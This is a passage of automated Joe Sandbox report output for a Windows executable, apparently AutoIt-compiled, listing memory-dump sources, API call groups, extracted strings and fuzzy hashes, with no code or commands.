                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                            • String ID:
                                                            • API String ID: 1352324309-0
                                                            • Opcode ID: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                            • Instruction ID: ba33dfa2f97a24c61e02e4d851c3c069e0e3c66a2097ac172d137d954c6724df
                                                            • Opcode Fuzzy Hash: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                            • Instruction Fuzzy Hash: BC11A7F670858282E720DF29F084369A7A1FB89B49FD44176DB4E4B648CF7CD554CB21
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                            • String ID:
                                                            • API String ID: 1539411459-0
                                                            • Opcode ID: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                            • Instruction ID: 45e64806c2a5654d005e8e06ff96cc37e63ca943ae9cbfefe470b5c9ab67d2c0
                                                            • Opcode Fuzzy Hash: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                            • Instruction Fuzzy Hash: 9B01F579A1839142E7006B16B808729FF60BB82B91F980136DE5907BA5CF7DD441CB11
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: gfffffff
                                                            • API String ID: 3215553584-1523873471
                                                            • Opcode ID: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                            • Instruction ID: f31d1a6c47642ed1b162621ab6ab378aa0d46541a628dedf4a23978b15ac4abf
                                                            • Opcode Fuzzy Hash: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                            • Instruction Fuzzy Hash: 72912AA6B0938686EB119F2DA1503B8AB95EB29BD0F548133DB8D073D5DE3DE512C312
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ContainedObject
                                                            • String ID: AutoIt3GUI$Container
                                                            • API String ID: 3565006973-3941886329
                                                            • Opcode ID: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                            • Instruction ID: 44b37c3336e3999c7289d5c7d4719cb3334b423605c98973045a99ecac6275cb
                                                            • Opcode Fuzzy Hash: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                            • Instruction Fuzzy Hash: D491397A604B4681DB24EF29E4506ADB3A5FB88F84FA18036DF4D43764EF39D899C311
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: e+000$gfff
                                                            • API String ID: 3215553584-3030954782
                                                            • Opcode ID: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                            • Instruction ID: 66bbf248c1b4a525531a76f8a7d0d6c0b025c29ae1a24f2cdf5dd648501b118f
                                                            • Opcode Fuzzy Hash: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                            • Instruction Fuzzy Hash: 47512FA6B187C146E725AF39B9413A9AB91EB81B90F88D232C79C47BD5CF3CD045C711
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: FileModuleName_invalid_parameter_noinfo
                                                            • String ID: C:\Users\user\Desktop\cxZuGa.exe
                                                            • API String ID: 3307058713-3001607027
                                                            • Opcode ID: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                            • Instruction ID: 98aa92abdc80b800d493133a0e8a3c9694090428f515aba6149cef009486359e
                                                            • Opcode Fuzzy Hash: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                            • Instruction Fuzzy Hash: 5241B27AA48A5285E715EF29F8812BDA7A4FF45794B844033EA0E07745DE3CE452C321
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateDestroyMessageObjectSendStock
                                                            • String ID: static
                                                            • API String ID: 3467290483-2160076837
                                                            • Opcode ID: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                            • Instruction ID: 404d14ce505df9b303635e3da7d008111426ce7800f21c135bf6ce72fc3b69bc
                                                            • Opcode Fuzzy Hash: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                            • Instruction Fuzzy Hash: 924149765086C2C6D674AF25F4407AEB7A0FB84791F504236EBEA03A99DB3CD481CB11
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWidehtonsinet_addr
                                                            • String ID: 255.255.255.255
                                                            • API String ID: 2496851823-2422070025
                                                            • Opcode ID: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                            • Instruction ID: 2126415e3c2937759ed41f93725b0fcda3330e1d4a8d5e9c43f10cd753bd286b
                                                            • Opcode Fuzzy Hash: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                            • Instruction Fuzzy Hash: F331BEAAA08642C1EB14AB22E85037CE760FB54B94F858533EE5E43391DE3CD545CB22
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _snwprintf
                                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                                            • API String ID: 3988819677-2584243854
                                                            • Opcode ID: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                            • Instruction ID: db6b45b33ce3ba342eafc1de70874ced4ed0645e3ebc6e58c8b63c24a15fbba1
                                                            • Opcode Fuzzy Hash: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                            • Instruction Fuzzy Hash: 0D3186BAB08B02C5EB24EB64F4512ECA361FB45784B804037CA1E17B59CF38E40AD362
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: FileHandleType
                                                            • String ID: @
                                                            • API String ID: 3000768030-2766056989
                                                            Similarity
                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                            • String ID: static
                                                            • API String ID: 1983116058-2160076837
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            Similarity
                                                            • API ID: _handle_error
                                                            • String ID: "$pow
                                                            • API String ID: 1757819995-713443511
                                                            Similarity
                                                            • API ID: ClassMessageNameSend
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 3678867486-1403004172
                                                            Similarity
                                                            • API ID: Internet$OpenOption
                                                            • String ID: <local>
                                                            • API String ID: 942729171-4266983199
                                                            Similarity
                                                            • API ID: ClassMessageNameSend
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 3678867486-1403004172
                                                            Similarity
                                                            • API ID: ClassMessageNameSend
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 3678867486-1403004172
                                                            Similarity
                                                            • API ID: CloseCreateHandleProcess
                                                            • String ID:
                                                            • API String ID: 3712363035-3916222277
                                                            Similarity
                                                            • API ID: ClassMessageNameSend
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 3678867486-1403004172
                                                            Similarity
                                                            • API ID: _ctrlfp_handle_error_raise_exc
                                                            • String ID: !$tan
                                                            • API String ID: 3384550415-2428968949
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: AutoIt$Error allocating memory.
                                                            • API String ID: 2030045667-4017498283
                                                            APIs
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7EC1475E9
                                                            • TlsSetValue.KERNEL32(?,?,?,00007FF7EC147241,?,?,?,?,00007FF7EC14660C,?,?,?,?,00007FF7EC144CD3), ref: 00007FF7EC147600
                                                            Similarity
                                                            • API ID: Valuetry_get_function
                                                            • String ID: FlsSetValue
                                                            • API String ID: 738293619-3750699315
                                                            APIs
                                                            • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7EC145629
                                                            • _CxxThrowException.LIBVCRUNTIME ref: 00007FF7EC14563A
                                                              • Part of subcall function 00007FF7EC147018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7EC14563F), ref: 00007FF7EC14708D
                                                              • Part of subcall function 00007FF7EC147018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7EC14563F), ref: 00007FF7EC1470BF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                            • String ID: Unknown exception
                                                            • API String ID: 3561508498-410509341
                                                            • Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                            • Instruction ID: e777dd9f60a738b2a3f259cc3e2f120aa3d4ebefc6b802ff13c6aa4de12b580e
                                                            • Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                            • Instruction Fuzzy Hash: 30D05B6A614645D1DE10FB04E4413A4E334F75030DFD04433D14C465B5EF3CD64AD751